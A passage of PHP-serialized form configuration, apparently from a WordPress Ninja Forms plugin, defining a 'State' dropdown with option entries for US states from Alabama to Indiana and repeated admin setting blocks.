";s:3:\"key\";s:8:\"city_216\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:501;}i:7;a:2:{s:8:\"settings\";a:36:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:5:\"State\";s:9:\"field_key\";s:14:\"listselect_218\";s:15:\"container_class\";s:14:\"one-half first\";s:4:\"type\";s:10:\"listselect\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"11\";s:5:\"label\";s:5:\"State\";s:9:\"label_pos\";s:5:\"above\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:9:\"list_type\";s:8:\"dropdown\";s:10:\"user_state\";s:1:\"1\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"populate_term\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"options\";a:52:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:24:\"Please Choose Your State\";s:5:\"value\";s:24:\"Please Choose Your State\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:20:\"District of Columbia\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 